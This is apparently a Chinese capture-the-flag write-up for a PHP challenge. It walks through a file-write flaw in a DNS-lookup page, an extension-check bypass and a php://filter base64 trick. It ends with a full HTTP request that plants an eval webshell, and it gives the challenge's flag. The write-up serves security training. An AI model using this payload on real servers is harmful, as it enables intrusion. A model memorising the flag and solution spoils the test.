PHP-综合4
[题目信息]:
| 题目名称 | 题目难度 |
|---|---|
| PHP-综合4 | 2 |
[题目考点]:
PHP综合训练
[Flag格式]:
SangFor{Ouk3i63BuShgxqdRcn_9kMNqKFDe5j4f}
[环境部署]:
docker-compose.yml文件或者docker tar原始文件。
http://分配ip:2087
[题目writeup]:
<?php
if(isset($_GET['read-source'])) {exit(show_source(__FILE__));
}
define(‘DATA_DIR’, dirname(FILE) . ‘/data/’ . md5($_SERVER[‘REMOTE_ADDR’]));
if(!is_dir(DATA_DIR)) {
mkdir(DATA_DIR, 0755, true);
}
chdir(DATA_DIR);
$domain = isset($_POST[‘domain’]) ? $_POST[‘domain’] : ‘’;
$log_name = isset($_POST[‘log’]) ? $_POST[‘log’] : date(’-Y-m-d’);
?>
<?php if(!empty($_POST) && $domain):
$command = sprintf(“dig -t A -q %s”, escapeshellarg($domain));
$output = shell_exec($command);
$output = htmlspecialchars($output, ENT_HTML401 | ENT_QUOTES);
$log_name = $_SERVER[‘SERVER_NAME’] . $log_name;
if(!in_array(pathinfo($log_name, PATHINFO_EXTENSION), [‘php’, ‘php3’, ‘php4’, ‘php5’, ‘phtml’, ‘pht’], true)) {
file_put_contents($log_name, $output);
}
echo $output;
endif; ?>
分析题目代码,首先把眼光放在可以写入文件的地方
$log_name = $_SERVER['SERVER_NAME'] . $log_name;
if(!in_array(pathinfo($log_name, PATHINFO_EXTENSION), ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'], true)) {file_put_contents($log_name, $output);
}
可以看到,文件名是由$_SERVER['SERVER_NAME']和$log_name两部分组成的。
$log_name可以由$_POST['log']来控制,至于$_SERVER['SERVER_NAME']可以通过修改Host头部进行控制。
在官方文档中表明,在Apache2中没有进行相应设置的话,这个值是会由客户端进行提供。
!in_array(pathinfo($log_name, PATHINFO_EXTENSION), ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'], true)
可以看到在源代码中只进行了文件后缀名的判断,但并没有以获取到的文件后缀当作写入文件的后缀,就可以利用shell.php/.的方式绕过。
观察写入文件内容,有一小部是用户可以自定义控制的,但是不能插入尖括号这些html字符,因为进行了一次转义。
这里可以利用php的伪协议,就可以控制写入文件的方式。base64解码中遇到不符合规范的字符直接跳过。所以虽然我们只能控制一部分内容,但是其他内容并不影响base64解码。另外因为base64解码是4位4位的解的,所以我们要保证我们需要解码的字符串之前的合法字符数为4的倍数,这样就不会影响我们传入的字符串正常解码。
需要注意的是base64中的=只能出现在最末尾,而我们插入的字符串是在中间的,所以我们插入的字符串里不能有=
发送数据包
POST / HTTP/1.1
Host: php
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.17.87:2087/
Cookie: PHPSESSID=056395276464d1b4480bc1457efbb106
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 102
domain=PD9waHAgZXZhbCgkX1BPU1RbJ3gnXSk7Pz4y&log=://filter/write=convert.base64-decode/resource=2.php/.
蚁剑连接data目录下,MD5编码访问者ip目录下的2.php文件即可
相关文章:
PHP-综合4
[题目信息]: 题目名称题目难度PHP-综合42 [题目考点]: PHP综合训练[Flag格式]: SangFor{Ouk3i63BuShgxqdRcn_9kMNqKFDe5j4f}[环境部署]: docker-compose.yml文件或者docker tar原始文件。 http://分配ip:2087[题目writeup]:…...
学习笔记-沁恒第五讲-米醋
一,设置音量 上次 这次 #include "uart.h" #include "debug.h" void audio_init() { Usart3_Init(); } void audio_play(u8 num) { u8 string[]{0x7e,0x05,0x41,0x00,num,0x05^0x41^0x00^num,0xef}; u8 i; for(i0;i<7;i) { USART_Se…...
【JavaScript】JavaScript 常见概念 - 变量与数据类型 - 运算符 - 条件语句 - 循环 - 函数 - 数组操作 - 对象
1. 变量与数据类型 变量声明 JavaScript 提供了三种方式来声明变量: var(全局或函数作用域,不推荐)let(块级作用域,推荐)const(常量,块级作用域,推荐&…...
Web自动化之Selenium添加网站Cookies实现免登录
在使用Selenium进行Web自动化时,添加网站Cookies是实现免登录的一种高效方法。通过模拟浏览器行为,我们可以将已登录状态的Cookies存储起来,并在下次自动化测试或爬虫任务中直接加载这些Cookies,从而跳过登录步骤。 Cookies简介 …...
AI手机的技术细节
前序:先说各个功能涉及到的技术,再说宏观系统架构。AI手机有这样几个做法,给手机侧边增加一个按键;把手机的语音助手做的很好,能够快速稳定的进行唤醒;通过特殊形式的触摸手机的曲面屏位置等来进行唤醒AI …...
)
10. 九转金丹炼矩阵 - 矩阵置零(标记优化)
哪吒在数据修仙界中继续他的修炼之旅。这一次,他来到了一片神秘的金丹谷,谷中有一座巨大的九转金丹炉,炉身闪烁着神秘的光芒。金丹炉的入口处有一块巨大的石碑,上面刻着一行文字:“欲破此炉,需以九转金丹之力,炼矩阵之零,标记优化定乾坤。” 哪吒定睛一看,石碑上还有…...
[实现Rpc] 客户端 | Requestor | RpcCaller的设计实现
目录 Requestor类的实现 框架 完善 onResponse处理回复 完整代码 RpcCaller类的实现 1. 同步调用 call 2. 异步调用 call 3. 回调调用 call Requestor类的实现 (1)主要功能: 客户端发送请求的功能,进行请求描述对服务器…...
Java 大视界 -- 深度洞察 Java 大数据安全多方计算的前沿趋势与应用革新(52)
💖💖💖亲爱的朋友们,热烈欢迎你们来到 青云交的博客!能与你们在此邂逅,我满心欢喜,深感无比荣幸。在这个瞬息万变的时代,我们每个人都在苦苦追寻一处能让心灵安然栖息的港湾。而 我的…...
山东大学软件学院nosql实验三
实验题目: 用Java做简单查询(2学时) 实验内容 用API方式,做简单查询。 实验要求 在以下要求中选择至少2个,使用Java语言实现数据查询,最终把数据输出到前端界面。 (1)找出年龄小于20岁的所有学生 &…...
为零?)
正态分布的奇妙性质:为什么奇数阶中心矩(odd central moments)为零?
正态分布的奇妙性质:为什么奇数阶矩为零? 正态分布(Normal Distribution)是统计学中最常见的分布之一,它的钟形曲线几乎无处不在,从身高体重到测量误差,都能看到它的影子。除了均值和方差这两个…...
【入门音视频】音视频基础知识
🌈前言🌈 这个系列在我学习过程中,对音视频知识归纳总结的笔记。因为音视频相关讲解非常稀少,所以我希望通过这个音视频系列,跟大家一起学习音视频,希望减少初学者在学习上的压力。同时希望也欢迎指出文章的…...
游戏引擎学习第120天
仓库:https://gitee.com/mrxiao_com/2d_game_3 上次回顾:周期计数代码 我们正在进行一个项目的代码优化工作,目标是提高性能。当前正在优化某个特定的代码片段,已经将其执行周期减少到48个周期。为了实现这一目标,我们设计了一个…...
【Qt之QQuickWidget】QML嵌入QWidget中
由于我项目开始使用Widgets,换公司后直接使用QML开发,没有了解过如何实现widget到qml过渡,恰逢面试时遇到一家公司希望从widget迁移到qml开发,询问相关实现,一时语塞,很尴尬,粗略研究并总结下。 对qwidget嵌…...
Vue 3 + Vite 项目中配置代理解决开发环境中跨域请求问题
在 Vue 3 Vite 项目中,配置代理是解决开发环境中跨域请求问题的常见方法。通过在 Vite 的配置文件中设置代理,可以将前端请求转发到后端服务器,从而避免浏览器的同源策略限制。 1. 创建 Vue 3 Vite 项目 首先,确保你已经安装了…...
Eureka、ZooKeeper 和 Nacos 之间的对比
Eureka、ZooKeeper 和 Nacos 都是分布式系统中常用的服务注册与发现工具,但它们的定位、功能和适用场景有所不同。作为一名开发者,理解它们之间的对比有助于选择合适的技术栈。以下从多个维度进行详细比较: 1. 基本概述 Eureka 来源ÿ…...
CSS中padding和margin属性的使用
在 HTML 中,padding 和 margin 是用于控制元素布局和间距的重要属性。 一、Padding(内边距) 定义:Padding 是指元素内容与元素边框之间的距离。它可以在元素内部创造出空白区域,使得内容不会紧贴着边框。 作用 增加元…...
】分布式爬虫:在新兴技术浪潮下的蜕变与展望)
【Python爬虫(49)】分布式爬虫:在新兴技术浪潮下的蜕变与展望
【Python爬虫】专栏简介:本专栏是 Python 爬虫领域的集大成之作,共 100 章节。从 Python 基础语法、爬虫入门知识讲起,深入探讨反爬虫、多线程、分布式等进阶技术。以大量实例为支撑,覆盖网页、图片、音频等各类数据爬取ÿ…...
网络安全-系统层攻击流程及防御措施
系统层攻击流程涉及多个阶段,攻击者通过逐步渗透以获取控制权或窃取数据。以下是详细的流程及防御措施: 1. 侦察(Reconnaissance) 信息收集: 主动扫描:使用工具如Nmap、Masscan扫描目标IP、开放端口、服务…...
centos 7 安装python3 及pycharm远程连接方法
安装openssl 使用pip3安装 virtualenv的时候会提示WARNING: pip is configured with locations that require TLS/SSL, however the ssl module in Python is not available. 这是因为缺少openssl 2.0以上版本 解决办法: 一、先确认版本 openssl version 二、安…...
【llm对话系统】如何快速开发一个支持openai接口的llm server呢
核心思路:使用轻量级 Web 框架,将 OpenAI API 请求转换为你现有推理脚本的输入格式,并将推理脚本的输出转换为 OpenAI API 的响应格式。 快速开发步骤列表: 选择合适的 Web 框架 (快速 & 简单): FastAPI: Python 最佳选择&am…...
股市学习心得-六大算力方向
1、顺灏股份(太空算力) ・卫星互联网 算力双重题材 ・市场辨识度高,机构愿意接力 ・位置偏低,短线弹性比较足 2、神剑股份(算力配套) ・做航天结构材料,受益算力基建 ・上游材料需求持续放量 ・…...
避坑指南:MATLAB gamultiobj参数调优与结果分析全攻略
MATLAB多目标优化实战:gamultiobj参数调优与Pareto解集深度分析 当你第一次用gamultiobj跑出一个看似完美的Pareto前沿时,那种成就感确实令人兴奋。但很快就会发现,同样的代码换个问题就跑出分布不均的解集,或者迭代几百代依然无法…...
)
别再只用LSTM了!手把手教你用CNN+BiLSTM+Attention搞定股票价格预测(附TensorFlow 2.5完整代码)
突破传统LSTM局限:CNNBiLSTMAttention在金融时序预测中的实战应用 金融市场的波动性让价格预测成为极具挑战性的任务。传统LSTM模型在处理这类复杂时序数据时,往往难以同时捕捉局部特征和全局依赖关系。这就像只用一种工具应对所有问题——效果必然受限。…...
FPGA——AXI4总线实战:从协议解析到高效设计
1. AXI4总线协议基础解析 第一次接触AXI4总线时,我被它复杂的信号列表吓到了。但真正理解后发现,这套协议设计得非常精妙。AXI4(Advanced eXtensible Interface)是ARM公司推出的第三代AMBA总线标准,现在已经成为FPGA设…...
FPGA设计中的AXI4总线:从协议解析到高效接口设计实战
1. AXI4总线协议基础解析 第一次接触AXI4总线时,我被它那复杂的信号列表吓到了。但真正理解后才发现,这套协议设计得相当精妙。AXI4(Advanced eXtensible Interface)是ARM公司推出的第四代AMBA总线标准,现在已经成为FP…...
从MATLAB验证到FPGA部署:手把手完成RGB/HSV色彩空间转换的完整流程
从MATLAB验证到FPGA部署:手把手完成RGB/HSV色彩空间转换的完整流程 色彩空间转换是数字图像处理中的基础操作,而RGB与HSV之间的转换尤为常见。对于FPGA开发者来说,如何将这一算法从软件仿真顺利迁移到硬件实现,是一个既考验理论功…...
STM32芯片被‘锁死’了?别慌,用ST-LINK Utility这个官方神器一键解锁Flash写保护
STM32芯片Flash写保护紧急解锁指南:ST-LINK Utility实战解析 实验室的灯光在凌晨两点依然亮着,你的STM32开发板静静躺在桌面上,而Keil MDK的报错窗口无情地显示着"Flash Timeout. Reset Target and try it again"。这种场景对于嵌入…...
MySQL Explain 执行计划性能对比
MySQL Explain执行计划性能对比:优化查询的关键利器 在数据库性能优化中,MySQL的Explain执行计划是分析SQL查询效率的重要工具。通过Explain,开发者可以直观地了解查询的执行路径、索引使用情况以及潜在的性能瓶颈。本文将从多个角度对比Exp…...
如何用Notepad--这款国产跨平台编辑器提升你的文本处理效率?
如何用Notepad--这款国产跨平台编辑器提升你的文本处理效率? 【免费下载链接】notepad-- 一个支持windows/linux/mac的文本编辑器,目标是做中国人自己的编辑器,来自中国。 项目地址: https://gitcode.com/GitHub_Trending/no/notepad-- …...
从-Xbootclasspath/p报错到成功启动:一次BurpSuite与Java版本兼容性实战排障
1. 当BurpSuite遇上Java高版本:一场兼容性噩梦的开始 那天我正打算给新电脑配置渗透测试环境,兴冲冲下载了BurpSuite破解版和配套的loader工具。双击burp-loader-keygen.jar时,系统就像什么都没发生一样安静——这场景是不是很熟悉࿱…...